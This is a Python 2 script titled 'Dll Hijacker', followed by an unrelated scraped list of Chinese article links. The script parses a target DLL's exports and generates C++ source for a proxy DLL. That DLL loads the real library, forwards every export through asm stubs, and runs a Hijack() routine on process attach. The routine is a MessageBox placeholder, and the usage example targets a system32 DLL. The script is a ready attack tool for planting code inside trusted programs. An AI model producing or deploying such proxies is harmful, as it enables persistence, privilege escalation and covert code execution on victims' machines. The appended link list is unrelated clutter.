#coding=utf-8

#

# Dll Hijacker

#

# platform: Python 2.x @ Windows

#

# author:Coca1ne

import os,sys,time

import pefile

def main():

    try:

        pe = pefile.PE(sys.argv[1])

        exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols

        print "[!]Find export function :[ %d ]\r\n" % len(exportTable)

        for exptab in exportTable:

            print "%3s %10s" % (exptab.ordinal, exptab.name)

        print "\r\n[+] generating DLL Hijack cpp file ..."

        generate(exportTable)

        print "\r\n[+] generating DLL Hijack cpp file has finished!"

    except Exception, e:

        print e

def generate(exportTable):

    segments = r"//Generate by DLLHijacker.py\

\

#include <Windows.h>\

\

DEFINE_DLL_EXPORT_FUNC\

#define EXTERNC extern \"C\"\

#define NAKED __declspec(naked)\

#define EXPORT __declspec(dllexport)\

#define ALCPP EXPORT NAKED\

#define ALSTD EXTERNC EXPORT NAKED void __stdcall\

#define ALCFAST EXTERNC EXPORT NAKED void __fastcall\

#define ALCDECL EXTERNC NAKED void __cdecl\

\

namespace DLLHijacker\

{\

    HMODULE m_hModule = NULL;\

    DWORD m_dwReturn[17] = {0};\

    inline BOOL WINAPI Load()\

    {\

        TCHAR tzPath[MAX_PATH];\

        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));\

        m_hModule = LoadLibrary(tzPath);\

        if (m_hModule == NULL)\

            return FALSE;\

        return (m_hModule != NULL);\

    }\

    inline VOID WINAPI Free()\

    {\

        if (m_hModule)\

            FreeLibrary(m_hModule);\

    }\

    FARPROC WINAPI GetAddress(PCSTR pszProcName)\

    {\

        FARPROC fpAddress;\

        CHAR szProcName[16];\

        fpAddress = GetProcAddress(m_hModule, pszProcName);\

        if (fpAddress == NULL)\

        {\

            if (HIWORD(pszProcName) == 0)\

            {\

                wsprintf(szProcName, \"%d\", pszProcName);\

                pszProcName = szProcName;\

            }\

            ExitProcess(-2);\

        }\

        return fpAddress;\

    }\

}\

using namespace DLLHijacker;\

VOID Hijack()\

{\

    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);\

}\

BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)\

{\

    if (dwReason == DLL_PROCESS_ATTACH)\

    {\

        DisableThreadLibraryCalls(hModule);\

        if(Load())\

            Hijack();\

    }\

    else if (dwReason == DLL_PROCESS_DETACH)\

    {\

        Free();\

    }\

    return TRUE;\

}\

"

    filename = sys.argv[1][sys.argv[1].rindex('\\')+1:sys.argv[1].rindex('.')]

    fp = open(filename + ".cpp", "w+")

    define_dll_exp_func = ""

    for exptable in exportTable:

        define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name) +\

                            "=_DLLHijacker_" + str(exptable.name) + ",@"+ str(exptable.ordinal) +"\")\n"

    segments = segments.replace('DLL_FILENAME', filename)

    segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\\','')

    fp.writelines(segments)

    forward_dll_exp_func = ""

    for exptable in exportTable:

        forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name) +"(void)\n{" + \

                            "\n        __asm POP m_dwReturn[0 * TYPE long];\n    GetAddress(\""+ \

                            str(exptable.name) + "\")();\n    __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n"

    fp.writelines(forward_dll_exp_func)

    fp.close()

def usage():

    print "Usage:"

    print "    %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0]

if __name__ == "__main__":

    if(len(sys.argv) <2):

        usage()

    else:

        main()

Dll Hijacker的更多相关文章

  1. 使用powershell提权的一些技巧

    原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html http ...

  2. metasploit--exploit模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  3. Kali linux 2016.2(Rolling)中的Exploits模块详解

    简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序. root@kali:~# msfconsole Unable to handle kernel NULL pointer der ...

  4. dll文件32位64位检测工具以及Windows文件夹SysWow64的坑

    自从操作系统升级到64位以后,就要不断的需要面对32位.64位的问题.相信有很多人并不是很清楚32位程序与64位程序的区别,以及Program Files (x86),Program Files的区别 ...

  5. C#创建dll类库

    类库让我们的代码可复用,我们只需要在类库中声明变量一次,就能在接下来的过程中无数次地使用,而无需在每次使用前都要声明它.这样一来,就节省了我们的内存空间.而想要在类库添加什么类,还需取决于类库要实现哪 ...

  6. 关于Linux和Windows下部署mysql.data.dll的注册问题

    mysql ado.net connector下载地址: http://dev.mysql.com/downloads/connector/net/ 选择版本: Generally Available ...

  7. Windows平台Go调用DLL的坑

    最近的项目中,使用了GO来开发一些服务中转程序.业务比较简单,但是有一些业务需要复用原有C++开发的代码.而在WINDOWS,用CGO方式来集成C/C++代码并不是太方便.所以用DLL把C++的代码封 ...

  8. C#开发奇技淫巧三:把dll放在不同的目录让你的程序更整洁

    系列文章 C#开发奇技淫巧一:调试windows系统服务 C#开发奇技淫巧二:根据dll文件加载C++或者Delphi插件 C#开发奇技淫巧三:把dll放在不同的目录让你的程序更整洁 程序目录的整理 ...

  9. .Net使用Newtonsoft.Json.dll(JSON.NET)对象序列化成json、反序列化json示例教程

    JSON作为一种轻量级的数据交换格式,简单灵活,被很多系统用来数据交互,作为一名.NET开发人员,JSON.NET无疑是最好的序列化框架,支持XML和JSON序列化,高性能,免费开源,支持LINQ查询 ...

随机推荐

  1. 前端开发 - HTML

    1.index2.head标签相关内容3.常用标签一4.常用标签二 table5.常用标签二 form6.标签分类 1.index <!--声明文档的类型 标记该文档为HTML5的文件--> ...

  2. String Problem --- hdu3374(kmp、字典序最大与最小)

    题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=3374 题意很简单,输出的是最小字典序的编号,最小字典序个数,最大字典序编号,最大字典序个数. 可以想一 ...

  3. luarocks安装以及lfs安装

    一.先安装lua: brew install lua 我本机的安装路径为:/usr/local/Cellar/lua/5.3.4_2 二.安装luarocks 下载luarocks的安装包: http ...

  4. springMvc异常之 For input string: "show"

    异常提示: For input string: "show" 异常原因: 使用@PathVariable方式获取值,返回类型为String return "redirec ...

  5. web Servlet 3.0 新特性之web模块化编程,web-fragment.xml编写及打jar包

    web Servlet 3.0 模块化 原本一个web应用的任何配置都需要在web.xml中进行,因此会使得web.xml变得很混乱,而且灵活性差,因此Servlet 3.0可以将每个Servlet. ...

  6. docker——Dockerfile(一)

    Dockerfile是一个文本格式的配置文件,用户可以使用Dockerfile来快速创建自定义的镜像.Dockerfile由一行行命令语句组成,并支持以#开头的注释行.一般而言,Dockerfile分 ...

  7. Codeforces Round #431 (Div. 2) C. From Y to Y

    题目: C. From Y to Y time limit per test 1 second memory limit per test 256 megabytes input standard i ...

  8. Divide by Zero 2017 and Codeforces Round #399 (Div. 1 + Div. 2, combined) B. Code For 1

    地址:http://codeforces.com/contest/768/problem/B 题目: B. Code For 1 time limit per test 2 seconds memor ...

  9. QUIC协议

    QUIC协议 QUIC协议参考网址 https://www.chromium.org/quic 既生瑜,何生亮? QUIC的特性 提供可靠传输 减少连接建立的时间 改善拥塞控制 多路复用 转发错误连接 ...

  10. js小工具---本地图片转换为base64编码数据

    今天用jmeter对图片对比进行性能测试,post请求为json请求,图片为Base64编码后的图片数据.所以需要将一张本地图片生成base64编码,找到一个js小工具,记录在这儿便于以后复用. 效果 ...